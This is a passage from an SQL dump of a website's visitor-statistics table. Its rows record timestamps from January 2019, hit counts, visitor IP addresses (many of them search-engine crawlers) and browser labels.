,0,'216.244.66.241','other'),(367549,1547038192,1,1,0,0,'66.249.66.40','chrome'),(367550,1547038313,3,3,0,0,'66.249.66.156','chrome'),(367551,1547038905,1,1,0,0,'5.45.207.19','other'),(367552,1547039097,1,1,0,0,'66.249.66.152','chrome'),(367553,1547039237,1,1,0,0,'8.29.198.27','other'),(367554,1547039246,1,1,0,0,'46.229.168.134','other'),(367555,1547039490,1,1,0,0,'66.249.66.59','chrome'),(367556,1547039491,1,1,0,0,'66.249.66.42','chrome'),(367557,1547039640,1,1,0,0,'216.244.66.241','other'),(367558,1547039699,1,1,0,0,'37.53.123.48','chrome'),(367559,1547039840,1,1,0,0,'46.229.168.132','other'),(367560,1547039959,1,1,0,0,'66.249.66.40','chrome'),(367561,1547040020,1,1,0,0,'87.250.224.47','other'),(367562,1547040154,2,2,0,0,'5.45.207.79','other'),(367563,1547040510,1,1,0,0,'178.154.244.11','other'),(367564,1547040518,1,1,0,0,'66.249.66.152','chrome'),(367565,1547040540,2,2,0,0,'91.196.178.79','chrome'),(367566,1547040780,3,3,0,0,'66.249.66.156','chrome'),(367567,1547040818,4,4,0,0,'216.244.66.241','other'),(367568,1547041489,1,1,0,0,'46.229.168.149','other'),(367569,1547041713,1,1,0,0,'66.249.66.152','chrome'),(367570,1547041734,1,1,0,0,'5.45.207.79','other'),(367571,1547041879,1,1,0,0,'46.229.168.130','other'),(367572,1547041888,1,1,0,0,'66.249.66.44','chrome'),(367573,1547041931,2,2,0,0,'91.196.178.79','chrome'),(367574,1547042229,1,1,0,0,'54.36.148.195','other'),(367575,1547042261,1,1,0,0,'51.255.65.46','other'),(367576,1547042764,1,1,0,0,'178.154.244.11','other'),(367577,1547042868,1,1,0,0,'91.196.178.135','chrome'),(367578,1547042968,1,1,0,0,'37.53.123.48','chrome'),(367579,1547043162,1,1,0,0,'46.229.168.150','other'),(367580,1547043243,2,2,0,0,'66.249.66.156','chrome'),(367581,1547043244,2,2,0,0,'66.249.66.152','chrome'),(367582,1547043428,1,1,0,0,'54.36.148.32','other'),(367583,1547043616,3,3,0,0,'216.244.66.241','other'),(367584,1547044623,2,2,0,0,'66.249.66.154','chrome'),(367585,1547044687,1,1,0,0,'66.249.66.42','chrome'),(367586,1547044721,4,4,0,0,'216.244.66.241','other'),(367587,1547045221,1,1,0,0,'40.77.167.164','other'),(367588,1547045413,1,1,0,0,'46.242.32.245','msie'),(367589,1547045415,1,1,0,0,'95.24.201.60','msie'),(367590,1547045425,2,2,0,0,'91.196.178.79','chrome'),(367591,1547045614,1,1,0,0,'66.249.66.152','chrome'),(367592,1547045754,3,3,0,0,'178.154.244.11','other'),(367593,1547046023,1,1,0,0,'95.108.213.4','other'),(367594,1547046036,2,2,0,0,'91.124.182.170','firefox'),(367595,1547046258,1,1,0,0,'95.163.255.117','other'),(367596,1547046268,1,1,0,0,'95.163.255.102','other'),(367597,1547046277,1,1,0,0,'95.163.255.113','other'),(367598,1547046285,1,1,0,0,'95.163.255.119','other'),(367599,1547046337,1,1,0,0,'37.9.113.148','other'),(367600,1547046393,10,10,0,0,'216.244.66.241','other'),(367601,1547046411,3,3,0,0,'5.45.207.79','other'),(367602,1547046415,1,1,0,0,'5.45.207.19','other'),(367603,1547046689,1,1,0,0,'46.229.168.154','other'),(367604,1547046691,1,1,0,0,'46.229.168.145','other'),(367605,1547046870,1,1,0,0,'46.229.168.137','other'),(367606,1547046903,1,1,0,0,'66.249.66.155','chrome'),(367607,1547046904,1,1,0,0,'66.249.66.154','chrome'),(367608,1547046925,1,1,0,0,'66.249.73.30','chrome'),(367609,1547047249,2,2,0,0,'178.154.244.11','other'),(367610,1547047330,1,1,0,0,'46.229.168.139','other'),(367611,1547047395,1,1,0,0,'66.249.66.152','chrome'),(367613,1547047457,1,1,0,0,'54.165.59.7','other'),(367614,1547047487,1,1,0,0,'216.244.66.241','other'),(367615,1547047763,1,1,0,0,'87.250.224.47','other'),(367616,1547047861,1,1,0,0,'141.8.142.103','other'),(367617,1547048180,1,1,0,0,'66.249.66.40','chrome'),(367618,1547048223,1,1,0,0,'66.249.66.156','chrome'),(367619,1547048231,1,1,0,0,'5.45.207.79','other'),(367620,1547048297,1,1,0,0,'66.249.66.152','chrome'),(367621,1547048637,1,1,0,0,'66.249.66.57','chrome'),(367622,1547048722,1,1,0,0,'8.29.198.25','other'),(367623,1547048878,1,1,0,0,'46.229.168.140','other'),(367624,1547048972,1,1,0,0,'46.229.168.144','other'),(367625,1547049140,2,2,0,0,'5.45.207.79','other'),(367626,1547049183,8,8,0,0,'216.244.66.241','other'),(367627,1547049200,1,1,0,0,'66.249.66.152','chrome'),(367628,1547049247,1,1,0,0,'66.249.66.157','chrome'),(367629,1547049248,3,3,0,0,'66.249.66.154','chrome'),(367630,1547049668,1,1,0,0,'207.46.13.130','other'),(367631,1547049927,1,1,0,0,'40.77.167.57','other'),(367632,1547050071,1,1,0,0,'8.29.198.27','other'),(367633,1547050214,1,1,0,0,'66.249.66.155','chrome'),(367634,1547050215,1,1,0,0,'66.249.66.154','chrome'),(367635,1547050303,1,1,0,0,'141.8.142.103','other'),(367636,1547050586,1,1,0,0,'46.229.168.134','other'),(367637,1547050948,3,3,0,0,'66.249.66.152','chrome'),(367638,1547051096,1,1,0,0,'66.249.66.156','chrome'),(367639,1547051175,1,1,0,0,'46.229.168.141','other'),(367640,1547051225,2,2,0,0,'66.249.66.154','chrome'),(367641,1547051289,1,1,0,0,'46.229.168.129','other'),(367642,1547051592,1,1,0,0,'66.249.66.44','chrome'),(367643,1547051657,2,2,0,0,'207.46.13.43','other'),(367644,1547051814,1,1,0,0,'66.249.66.57','chrome'),(367645,1547051969,5,5,0,0,'216.244.66.241','other'),(367646,1547052538,1,1,0,0,'178.154.244.11','other'),(367647,1547052647,1,1,0,0,'66.102.9.62','chrome'),(367648,1547052728,1,1,0,0,'62.205.134.182','msie'),(367649,1547052794,1,1,0,0,'46.229.168.133','other'),(367650,1547052905,1,1,0,0,'216.244.66.241','other'),(367651,1547053046,1,1,0,0,'46.229.168.146','other'),(367652,1547053120,1,1,0,0,'40.77.167.144','other'),(367653,1547053121,1,1,0,0,'46.229.168.129','other'),(367654,1547053573,1,1,0,0,'66.249.66.44','chrome'),(367655,1547053705,1,1,0,0,'46.229.168.136','other'),(367656,1547054043,6,6,0,0,'216.244.66.241','other'),(367657,1547054069,2,2,0,0,'66.249.66.40','chrome'),(367658,1547054240,1,1,0,0,'5.45.207.19','other'),(367659,1547054359,1,1,0,0,'66.249.66.157','chrome'),(367660,1547054476,1,1,0,0,'46.229.168.146','other'),(367661,1547054756,1,1,0,0,'40.77.167.52','other'),(367662,1547054763,1,1,0,0,'46.229.168.142','other'),(367663,1547054894,1,1,0,0,'40.77.167.167','other'),(367664,1547055006,1,1,0,0,'180.76.15.151','other'),(367665,1547055007,1,1,0,0,'180.76.15.134','other'),(367666,1547055032,1,1,0,0,'66.249.66.156','chrome'),(367667,1547055099,3,3,0,0,'216.244.66.241','other'),(367668,1547055226,2,2,0,0,'46.229.168.138','other'),(367669,1547055307,3,3,0,0,'178.154.244.11','other'),(367670,1547055356,1,1,0,0,'66.249.66.152','chrome'),(367671,1547055360,2,2,0,0,'5.45.207.19','other'),(367672,1547055369,1,1,0,0,'5.45.207.79','other'),(367673,1547055427,2,2,0,0,'46.211.125.184','chrome'),(367674,1547055585,1,1,0,0,'46.229.168.152','other'),(367675,1547056262,1,1,0,0,'95.132.132.25','chrome'),(367676,1547056267,1,1,0,0,'66.249.66.157','chrome'),(367677,1547056268,2,2,0,0,'66.249.66.156','chrome'),(367678,1547056902,1,1,0,0,'188.163.16.151','chrome'),(367679,1547057531,3,3,0,0,'216.244.66.241','other'),(367680,1547058498,3,3,0,0,'216.244.66.241','other'),(367681,1547059016,2,2,0,0,'66.249.66.152','chrome'),(367682,1547059287,1,1,0,0,'46.229.168.137','other'),(367683,1547059426,1,1,0,0,'66.249.66.156','chrome'),(367684,1547059565,1,1,0,0,'8.29.198.27','other'),(367685,1547060037,1,1,0,0,'40.77.169.26','other'),(367686,1547060155,2,2,0,0,'207.46.13.105','other'),(367687,1547060184,1,1,0,0,'95.163.255.117','other'),(367688,1547060192,1,1,0,0,'95.163.255.114','other'),(367689,1547060212,1,1,0,0,'95.163.255.118','other'),(367690,1547060220,1,1,0,0,'95.163.255.113','other'),(367691,1547060227,1,1,0,0,'95.163.255.107','other'),(367692,1547060235,1,1,0,0,'95.163.255.106','other'),(367693,1547060340,7,7,0,0,'216.244.66.241','other'),(367694,1547060384,1,1,0,0,'46.229.168.129','other'),(367695,1547060904,1,1,0,0,'8.29.198.25','other'),(367696,1547060922,1,1,0,0,'66.249.66.156','chrome'),(367697,1547061035,1,1,0,0,'66.249.66.57','chrome'),(367698,1547061036,1,1,0,0,'66.249.66.42','chrome'),(367699,1547061142,1,1,0,0,'46.229.168.145','other'),(367700,1547061232,1,1,0,0,'66.249.66.154','chrome'),(367701,1547061257,2,2,0,0,'216.244.66.241','other'),(367702,1547062587,1,1,0,0,'46.229.168.150','other'),(367703,1547063116,4,4,0,0,'216.244.66.241','other'),(367704,1547063179,2,2,0,0,'91.196.178.167','chrome'),(367705,1547063328,1,1,0,0,'46.229.168.137','other'),(367706,1547063331,1,1,0,0,'46.229.168.153','other'),(367707,1547063445,1,1,0,0,'5.45.207.19','other'),(367708,1547063702,3,3,0,0,'178.154.244.11','other'),(367709,1547064308,1,1,0,0,'66.249.66.155','chrome'),(367710,1547064312,1,1,0,0,'66.249.66.156','chrome'),(367711,1547064402,1,1,0,0,'40.77.167.164','other'),(367712,1547064418,1,1,0,0,'216.244.66.241','other'),(367713,1547064457,1,1,0,0,'46.229.168.130','other'),(367714,1547064538,1,1,0,0,'66.249.66.157','chrome'),(367715,1547064539,2,2,0,0,'66.249.66.152','chrome'),(367716,1547064606,1,1,0,0,'66.249.66.154','chrome'),(367717,1547064855,1,1,0,0,'5.45.207.19','other'),(367718,1547064936,1,1,0,0,'141.8.142.103','other'),(367719,1547065877,8,8,0,0,'216.244.66.241','other'),(367720,1547065879,1,1,0,0,'66.249.66.154','chrome'),(367721,1547066235,1,1,0,0,'66.249.66.61','chrome'),(367723,1547066623,2,2,0,0,'91.196.178.133','chrome'),(367724,1547066841,3,3,0,0,'216.244.66.241','other'),(367725,1547066851,1,1,0,0,'66.249.66.154','chrome'),(367726,1547067218,1,1,0,0,'66.249.66.152','chrome'),(367727,1547067966,4,4,0,0,'216.244.66.241','other'),(367728,1547068040,2,2,0,0,'66.249.66.40','chrome'),(367729,1547068855,1,1,0,0,'46.229.168.143','other'),(367730,1547068882,3,3,0,0,'216.244.66.241','other'),(367731,1547069015,1,1,0,0,'207.46.13.187','other'),(367732,1547069371,1,1,0,0,'46.229.168.149','other'),(367733,1547070123,1,1,0,0,'66.249.66.42','chrome'),(367734,1547070288,1,1,0,0,'46.229.168.145','other'),(367735,1547070289,1,1,0,0,'46.229.168.144','other'),(367736,1547070359,1,1,0,0,'66.249.66.57','chrome'),(367737,1547070360,1,1,0,0,'66.249.66.44','chrome'),(367738,1547070412,1,1,0,0,'8.29.198.25','other'),(367739,1547070486,1,1,0,0,'66.249.66.154','chrome'),(367740,1547070681,1,1,0,0,'37.9.113.20','other'),(367741,1547070688,1,1,0,0,'66.249.66.152','chrome'),(367742,1547070810,1,1,0,0,'87.250.224.47','other'),(367743,1547070817,1,1,0,0,'37.9.113.148','other'),(367744,1547070855,1,1,0,0,'178.154.244.11','other'),(367745,1547070897,1,1,0,0,'95.108.213.4','other'),(367746,1547071004,1,1,0,0,'5.45.207.19','other'),(367747,1547071368,1,1,0,0,'87.250.224.65','other'),(367748,1547071423,11,11,0,0,'216.244.66.241','other'),(367749,1547071739,1,1,0,0,'8.29.198.25','other'),(367750,1547072008,1,1,0,0,'207.46.13.187','other'),(367751,1547072080,1,1,0,0,'66.249.66.42','chrome'),(367752,1547072181,1,1,0,0,'5.45.207.19','other'),(367753,1547072632,2,2,0,0,'46.229.168.152','other'),(367754,1547073021,1,1,0,0,'216.244.66.241','other'),(367755,1547073180,1,1,0,0,'207.46.13.187','other'),(367756,1547073223,1,1,0,0,'46.229.168.129','other'),(367757,1547073305,2,2,0,0,'66.249.66.154','chrome'),(367758,1547073344,1,1,0,0,'66.249.66.44','chrome'),(367759,1547073594,1,1,0,0,'66.249.66.40','chrome'),(367760,1547074163,1,1,0,0,'46.229.168.132','other'),(367761,1547074165,1,1,0,0,'46.229.168.153','other'),(367762,1547074217,7,7,0,0,'216.244.66.241','other'),(367763,1547075007,1,1,0,0,'46.229.168.129','other'),(367764,1547075145,1,1,0,0,'216.244.66.241','other'),(367765,1547075364,1,1,0,0,'46.229.168.152','other'),(367766,1547075849,1,1,0,0,'66.249.66.57','chrome'),(367767,1547075850,1,1,0,0,'66.249.66.40','chrome'),(367768,1547076329,1,1,0,0,'66.249.66.152','chrome'),(367769,1547076960,2,2,0,0,'66.249.66.156','chrome'),(367770,1547076985,8,8,0,0,'216.244.66.241','other'),(367771,1547077003,3,3,0,0,'178.154.244.11','other'),(367772,1547077086,1,1,0,0,'37.9.113.20','other'),(367773,1547077128,1,1,0,0,'5.45.207.79','other'),(367774,1547077972,4,4,0,0,'216.244.66.241','other'),(367775,1547078542,1,1,0,0,'207.46.13.187','other'),(367776,1547078575,2,2,0,0,'66.249.66.152','chrome'),(367777,1547078702,1,1,0,0,'46.229.168.141','other'),(367778,1547078703,1,1,0,0,'46.229.168.154','other'),(367779,1547078809,2,2,0,0,'193.201.224.211','msie'),(367780,1547078897,3,3,0,0,'66.249.66.156','chrome'),(367781,1547079440,1,1,0,0,'66.249.66.44','chrome'),(367782,1547079554,1,1,0,0,'88.99.2.203','other'),(367783,1547079747,10,10,0,0,'216.244.66.241','other'),(367784,1547080381,1,1,0,0,'66.249.66.152','chrome'),(367785,1547080851,1,1,0,0,'46.229.168.130','other'),(367786,1547080986,1,1,0,0,'18.184.52.215','other'),(367787,1547081011,2,2,0,0,'216.244.66.241','other'),(367788,1547081036,1,1,0,0,'46.229.168.138','other'),(367789,1547081251,1,1,0,0,'8.29.198.26','other'),(367790,1547081441,1,1,0,0,'66.249.66.59','chrome'),(367791,1547081771,1,1,0,0,'91.121.112.181','other'),(367792,1547082007,1,1,0,0,'66.249.66.154','chrome'),(367793,1547082009,1,1,0,0,'66.249.66.156','chrome'),(367794,1547082276,1,1,0,0,'46.229.168.153','other'),(367795,1547082305,1,1,0,0,'54.36.148.82','other'),(367796,1547082330,1,1,0,0,'54.36.148.237','other'),(367797,1547082515,11,11,0,0,'216.244.66.241','other'),(367798,1547082570,1,1,0,0,'8.29.198.27','other'),(367799,1547082734,1,1,0,0,'46.229.168.135','other'),(367800,1547082735,1,1,0,0,'46.229.168.154','other'),(367801,1547083218,1,1,0,0,'46.229.168.153','other'),(367802,1547083630,1,1,0,0,'216.244.66.241','other'),(367803,1547084000,1,1,0,0,'54.36.149.61','other'),(367804,1547084034,3,3,0,0,'66.249.66.156','chrome'),(367805,1547084044,1,1,0,0,'66.249.66.154','chrome'),(367806,1547084102,1,1,0,0,'207.46.13.63','other'),(367807,1547084182,2,2,0,0,'178.154.244.11','other'),(367808,1547084344,2,2,0,0,'5.45.207.19','other'),(367809,1547084379,1,1,0,0,'46.229.168.135','other'),(367810,1547084381,1,1,0,0,'46.229.168.130','other'),(367811,1547084491,1,1,0,0,'141.8.142.103','other'),(367812,1547084953,1,1,0,0,'54.36.148.59','other'),(367813,1547084969,1,1,0,0,'54.36.148.121','other'),(367814,1547085009,1,1,0,0,'54.36.148.157','other'),(367815,1547085263,7,7,0,0,'216.244.66.241','other'),(367816,1547086047,1,1,0,0,'54.36.148.145','other'),(367817,1547086209,1,1,0,0,'46.229.168.154','other'),(367818,1547086287,5,5,0,0,'216.244.66.241','other'),(367819,1547086317,1,1,0,0,'66.249.66.152','chrome'),(367820,1547086441,1,1,0,0,'66.249.66.42','chrome'),(367821,1547086521,1,1,0,0,'54.36.148.122','other'),(367822,1547086703,1,1,0,0,'46.229.168.135','other'),(367823,1547086715,1,1,0,0,'54.36.148.40','other'),(367824,1547086755,1,1,0,0,'88.99.2.203','other'),(367825,1547087178,1,1,0,0,'54.36.148.35','other'),(367826,1547087245,1,1,0,0,'54.36.148.165','other'),(367827,1547087371,1,1,0,0,'54.36.148.141','other'),(367828,1547087401,2,2,0,0,'66.249.66.152','chrome'),(367829,1547087789,1,1,0,0,'54.36.148.66','other'),(367830,1547087836,1,1,0,0,'54.36.148.231','other'),(367831,1547087919,1,1,0,0,'66.249.66.154','chrome'),(367832,1547088024,7,7,0,0,'216.244.66.241','other'),(367833,1547088047,1,1,0,0,'54.36.148.196','other'),(367834,1547088185,1,1,0,0,'54.36.148.226','other'),(367835,1547088441,1,1,0,0,'66.249.66.42','chrome'),(367836,1547088536,2,2,0,0,'207.46.13.63','other'),(367837,1547088965,1,1,0,0,'216.244.66.241','other'),(367838,1547089204,1,1,0,0,'66.249.66.40','chrome'),(367839,1547089257,1,1,0,0,'54.36.148.89','other'),(367840,1547089290,2,2,0,0,'66.249.66.152','chrome'),(367841,1547089554,1,1,0,0,'66.249.66.154','chrome'),(367842,1547089853,1,1,0,0,'54.36.148.32','other'),(367843,1547089927,1,1,0,0,'66.249.66.44','chrome'),(367844,1547089994,1,1,0,0,'54.36.148.80','other'),(367845,1547090093,1,1,0,0,'54.36.148.243','other'),(367846,1547090182,2,2,0,0,'157.55.39.224','other'),(367847,1547090227,1,1,0,0,'178.154.244.11','other'),(367848,1547090250,1,1,0,0,'54.36.149.5','other'),(367849,1547090364,1,1,0,0,'207.46.13.9','other'),(367850,1547090555,2,2,0,0,'66.249.66.154','chrome'),(367851,1547090818,9,9,0,0,'216.244.66.241','other'),(367852,1547090869,1,1,0,0,'37.9.113.20','other'),(367853,1547090930,2,2,0,0,'5.45.207.79','other'),(367854,1547091079,1,1,0,0,'54.36.148.239','other'),(367855,1547091337,1,1,0,0,'54.36.148.170','other'),(367856,1547091459,1,1,0,0,'54.36.148.117','other'),(367857,1547091520,1,1,0,0,'5.45.207.19','other'),(367858,1547091524,1,1,0,0,'178.154.244.11','other'),(367859,1547091821,1,1,0,0,'66.249.66.40','chrome'),(367860,1547092019,1,1,0,0,'54.36.149.58','other'),(367861,1547092095,1,1,0,0,'8.29.198.27','other'),(367862,1547092225,1,1,0,0,'54.36.148.37','other'),(367863,1547092378,1,1,0,0,'216.244.66.241','other'),(367864,1547092600,1,1,0,0,'54.36.148.32','other'),(367865,1547092618,1,1,0,0,'54.36.148.115','other'),(367866,1547092626,1,1,0,0,'54.36.148.239','other'),(367867,1547092850,1,1,0,0,'46.229.168.150','other'),(367868,1547092944,1,1,0,0,'54.36.148.86','other'),(367869,1547093044,1,1,0,0,'40.77.167.10','other'),(367870,1547093084,1,1,0,0,'54.36.149.56','other'),(367871,1547093201,1,1,0,0,'54.36.148.171','other'),(367872,1547093400,1,1,0,0,'8.29.198.26','other'),(367873,1547093429,1,1,0,0,'54.36.148.248','other'),(367874,1547093529,1,1,0,0,'54.36.149.33','other'),(367875,1547093608,11,11,0,0,'216.244.66.241','other'),(367876,1547093638,1,1,0,0,'54.36.148.54','other'),(367877,1547094052,1,1,0,0,'54.36.148.60','other'),(367878,1547094641,1,1,0,0,'216.244.66.241','other'),(367879,1547095359,2,2,0,0,'207.46.13.63','other'),(367880,1547095504,1,1,0,0,'54.36.149.21','other'),(367881,1547095632,1,1,0,0,'54.36.149.25','other'),(367882,1547095676,1,1,0,0,'54.36.148.178','other'),(367883,1547095700,6,6,0,0,'216.244.66.241','other'),(367884,1547096173,1,1,0,0,'54.36.149.103','other'),(367885,1547096216,1,1,0,0,'54.36.148.12','other'),(367886,1547096458,1,1,0,0,'207.46.13.63','other'),(367887,1547096637,1,1,0,0,'54.36.148.215','other'),(367888,1547096644,1,1,0,0,'66.249.66.156','chrome'),(367889,1547096776,6,6,0,0,'216.244.66.241','other'),(367890,1547097412,1,1,0,0,'66.249.66.152','chrome'),(367891,1547097416,1,1,0,0,'66.249.66.154','chrome'),(367892,1547097667,1,1,0,0,'207.46.13.63','other'),(367893,1547097961,1,1,0,0,'54.36.148.185','other'),(367894,1547098022,2,2,0,0,'54.202.4.100','chrome'),(367895,1547098066,1,1,0,0,'216.244.66.241','other'),(367896,1547098085,1,1,0,0,'54.36.148.195','other'),(367897,1547098141,1,1,0,0,'54.36.149.99','other'),(367898,1547098306,1,1,0,0,'5.45.207.19','other'),(367899,1547098508,1,1,0,0,'66.249.66.44','chrome'),(367900,1547098545,1,1,0,0,'54.36.148.128','other'),(367901,1547098724,1,1,0,0,'157.55.39.60','other'),(367902,1547098771,1,1,0,0,'5.45.207.79','other'),(367903,1547098809,2,2,0,0,'66.249.66.155','chrome'),(367905,1547098820,1,1,0,0,'66.249.66.156','chrome'),(367906,1547098822,2,2,0,0,'66.249.66.152','chrome'),(367907,1547098855,1,1,0,0,'207.46.13.52','other'),(367908,1547098980,1,1,0,0,'87.250.224.47','other'),(367909,1547098984,1,1,0,0,'54.36.149.47','other'),(367910,1547099184,1,1,0,0,'54.36.148.113','other'),(367911,1547099240,6,6,0,0,'216.244.66.241','other'),(367912,1547099481,1,1,0,0,'95.108.213.4','other'),(367913,1547099618,1,1,0,0,'5.45.207.19','other'),(367914,1547099710,1,1,0,0,'54.36.148.160','other'),(367915,1547099745,1,1,0,0,'207.46.13.63','other'),(367916,1547100029,1,1,0,0,'54.36.148.111','other'),(367917,1547100047,1,1,0,0,'141.8.142.108','other'),(367918,1547100345,5,5,0,0,'216.244.66.241','other'),(367919,1547100351,2,2,0,0,'192.42.116.20','other'),(367920,1547100476,2,2,0,0,'66.249.66.40','chrome'),(367921,1547100503,1,1,0,0,'66.249.66.157','chrome'),(367922,1547100504,1,1,0,0,'66.249.66.156','chrome'),(367923,1547100574,1,1,0,0,'46.229.168.134','other'),(367924,1547100670,1,1,0,0,'46.229.168.129','other'),(367925,1547100809,1,1,0,0,'66.249.66.154','chrome'),(367926,1547100865,1,1,0,0,'54.36.148.144','other'),(367927,1547100943,1,1,0,0,'66.249.66.57','chrome'),(367928,1547101140,1,1,0,0,'207.46.13.175','other'),(367929,1547101200,1,1,0,0,'54.36.148.217','other'),(367930,1547101645,1,1,0,0,'46.229.168.152','other'),(367931,1547102025,2,2,0,0,'181.214.42.42','chrome'),(367932,1547102039,9,9,0,0,'216.244.66.241','other'),(367933,1547102128,3,3,0,0,'66.249.66.156','chrome'),(367934,1547102192,2,2,0,0,'66.249.66.154','chrome'),(367935,1547102297,2,2,0,0,'46.229.168.140','other'),(367936,1547102299,1,1,0,0,'46.229.168.148','other'),(367937,1547102719,1,1,0,0,'54.36.149.107','other'),(367938,1547102729,2,2,0,0,'91.196.178.79','chrome'),(367939,1547102767,1,1,0,0,'66.249.66.44','chrome'),(367940,1547102880,1,1,0,0,'46.211.148.234','chrome'),(367941,1547102940,1,1,0,0,'8.29.198.25','other'),(367942,1547102951,1,1,0,0,'54.36.148.87','other'),(367943,1547103172,4,4,0,0,'216.244.66.241','other'),(367944,1547103213,1,1,0,0,'66.249.66.155','chrome'),(367945,1547103279,1,1,0,0,'54.36.148.64','other'),(367946,1547103281,1,1,0,0,'54.36.148.197','other'),(367947,1547103486,1,1,0,0,'95.163.255.68','other'),(367948,1547103489,1,1,0,0,'95.163.255.66','other'),(367949,1547103674,1,1,0,0,'54.36.148.212','other'),(367950,1547103806,1,1,0,0,'54.36.148.221','other'),(367951,1547104038,1,1,0,0,'66.249.66.157','chrome'),(367952,1547104039,1,1,0,0,'66.249.66.154','chrome'),(367953,1547104109,1,1,0,0,'54.36.148.135','other'),(367954,1547104152,1,1,0,0,'66.249.66.40','chrome'),(367955,1547104184,1,1,0,0,'54.36.148.198','other'),(367956,1547104236,1,1,0,0,'8.29.198.27','other'),(367957,1547104527,1,1,0,0,'54.36.148.204','other'),(367958,1547104779,1,1,0,0,'66.249.66.156','chrome'),(367959,1547104780,1,1,0,0,'66.249.66.152','chrome'),(367960,1547104847,4,4,0,0,'216.244.66.241','other'),(367961,1547104911,1,1,0,0,'54.36.149.93','other'),(367962,1547104945,1,1,0,0,'54.36.148.218','other'),(367963,1547105240,2,2,0,0,'91.196.177.46','firefox'),(367964,1547105281,1,1,0,0,'54.36.148.147','other'),(367965,1547105316,1,1,0,0,'46.229.168.129','other'),(367966,1547105524,1,1,0,0,'77.111.244.89','chrome'),(367967,1547105780,4,4,0,0,'5.45.207.79','other'),(367968,1547105837,4,4,0,0,'216.244.66.241','other'),(367969,1547105943,1,1,0,0,'178.154.244.11','other'),(367970,1547106004,1,1,0,0,'66.249.66.156','chrome'),(367971,1547106006,1,1,0,0,'54.36.148.51','other'),(367972,1547106048,1,1,0,0,'141.8.142.103','other'),(367973,1547106113,1,1,0,0,'188.163.16.129','firefox'),(367974,1547106215,1,1,0,0,'5.45.207.19','other'),(367975,1547106271,1,1,0,0,'95.108.213.4','other'),(367976,1547107010,1,1,0,0,'178.154.244.11','other'),(367977,1547107525,1,1,0,0,'54.36.148.74','other'),(367978,1547107694,6,6,0,0,'216.244.66.241','other'),(367979,1547107709,1,1,0,0,'54.36.148.215','other'),(367980,1547107728,3,3,0,0,'91.196.178.79','chrome'),(367981,1547107746,1,1,0,0,'54.36.148.192','other'),(367982,1547107753,1,1,0,0,'46.229.168.140','other'),(367983,1547107805,1,1,0,0,'66.249.66.154','chrome'),(367984,1547108536,1,1,0,0,'54.36.148.162','other'),(367985,1547108573,2,2,0,0,'207.46.13.9','other'),(367986,1547108610,2,2,0,0,'91.196.178.67','chrome'),(367987,1547109125,2,2,0,0,'216.244.66.241','other'),(367988,1547109637,1,1,0,0,'54.36.148.113','other'),(367989,1547109976,1,1,0,0,'54.36.148.222','other'),(367990,1547110089,1,1,0,0,'54.36.148.196','other'),(367991,1547110114,1,1,0,0,'46.252.211.24','chrome'),(367992,1547110377,1,1,0,0,'141.8.142.103','other'),(367993,1547110419,1,1,0,0,'54.36.148.103','other'),(367994,1547110487,1,1,0,0,'207.46.13.9','other'),(367995,1547110550,1,1,0,0,'54.36.148.45','other'),(367996,1547110558,11,11,0,0,'216.244.66.241','other'),(367997,1547110578,1,1,0,0,'54.36.148.214','other'),(367998,1547110664,2,2,0,0,'91.196.178.67','chrome'),(367999,1547111016,1,1,0,0,'66.249.66.154','chrome'),(368000,1547111179,1,1,0,0,'66.249.66.156','chrome'),(368001,1547111199,1,1,0,0,'54.36.148.69','other'),(368002,1547111222,1,1,0,0,'54.36.149.4','other'),(368003,1547111382,1,1,0,0,'180.76.15.142','other'),(368004,1547111721,3,3,0,0,'216.244.66.241','other'),(368005,1547111731,1,1,0,0,'207.46.13.52','other'),(368006,1547111844,1,1,0,0,'54.36.148.157','other'),(368007,1547111905,2,2,0,0,'91.209.11.236','other'),(368008,1547111929,2,2,0,0,'91.196.178.133','firefox'),(368009,1547112130,1,1,0,0,'54.36.148.156','other'),(368010,1547112144,1,1,0,0,'54.36.148.27','other'),(368011,1547112263,2,2,0,0,'46.164.130.92','chrome'),(368012,1547112355,2,2,0,0,'91.196.177.46','chrome'),(368013,1547112477,4,4,0,0,'91.196.178.65','chrome'),(368014,1547112510,1,1,0,0,'46.229.168.133','other'),(368015,1547112595,1,1,0,0,'31.43.31.110','chrome'),(368016,1547112917,1,1,0,0,'66.249.66.155','chrome'),(368017,1547112918,1,1,0,0,'66.249.66.152','chrome'),(368018,1547112929,1,1,0,0,'54.36.149.107','other'),(368019,1547113080,1,1,0,0,'54.36.148.78','other'),(368020,1547113197,1,1,0,0,'95.108.213.4','other'),(368021,1547113222,1,1,0,0,'91.196.177.228','chrome'),(368022,1547113273,1,1,0,0,'207.46.13.63','other'),(368023,1547113292,1,1,0,0,'66.249.66.154','chrome'),(368024,1547113318,1,1,0,0,'37.9.113.148','other'),(368025,1547113339,1,1,0,0,'46.200.186.163','chrome'),(368026,1547113381,3,3,0,0,'216.244.66.241','other'),(368027,1547113400,1,1,0,0,'66.249.66.42','chrome'),(368028,1547113482,4,4,0,0,'178.154.244.11','other'),(368029,1547113486,1,1,0,0,'141.8.142.103','other'),(368030,1547113568,1,1,0,0,'5.45.207.79','other'),(368031,1547113784,1,1,0,0,'8.29.198.27','other'),(368032,1547113892,1,1,0,0,'46.229.168.138','other'),(368033,1547113894,1,1,0,0,'46.229.168.152','other'),(368034,1547114065,1,1,0,0,'54.36.149.59','other'),(368035,1547114122,1,1,0,0,'5.45.207.19','other'),(368036,1547114162,1,1,0,0,'91.196.177.228','chrome'),(368037,1547114201,1,1,0,0,'54.36.148.88','other'),(368038,1547114204,1,1,0,0,'54.36.148.203','other'),(368039,1547114255,1,1,0,0,'54.36.148.84','other'),(368040,1547114284,1,1,0,0,'40.77.167.142','other'),(368041,1547114430,10,10,0,0,'216.244.66.241','other'),(368042,1547114442,1,1,0,0,'66.249.66.155','chrome'),(368044,1547114571,1,1,0,0,'54.36.148.61','other'),(368045,1547114822,1,1,0,0,'46.229.168.138','other'),(368046,1547114985,1,1,0,0,'54.36.148.230','other'),(368047,1547115020,1,1,0,0,'66.249.66.152','chrome'),(368048,1547115062,1,1,0,0,'8.29.198.26','other'),(368049,1547115373,3,3,0,0,'207.46.13.63','other'),(368050,1547115391,1,1,0,0,'37.53.233.139','chrome'),(368051,1547115710,1,1,0,0,'54.36.148.69','other'),(368052,1547115812,2,2,0,0,'91.196.178.65','firefox'),(368053,1547116159,1,1,0,0,'91.196.178.67','chrome'),(368054,1547116185,8,8,0,0,'216.244.66.241','other'),(368055,1547116259,1,1,0,0,'54.36.148.136','other'),(368056,1547116279,1,1,0,0,'54.36.149.16','other'),(368057,1547116853,1,1,0,0,'54.36.148.55','other'),(368058,1547116914,1,1,0,0,'46.229.168.146',